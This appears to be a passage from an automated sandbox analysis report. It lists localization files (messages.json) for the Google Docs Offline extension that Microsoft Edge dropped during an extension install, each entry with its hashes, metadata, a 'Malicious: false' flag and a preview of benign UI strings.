Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
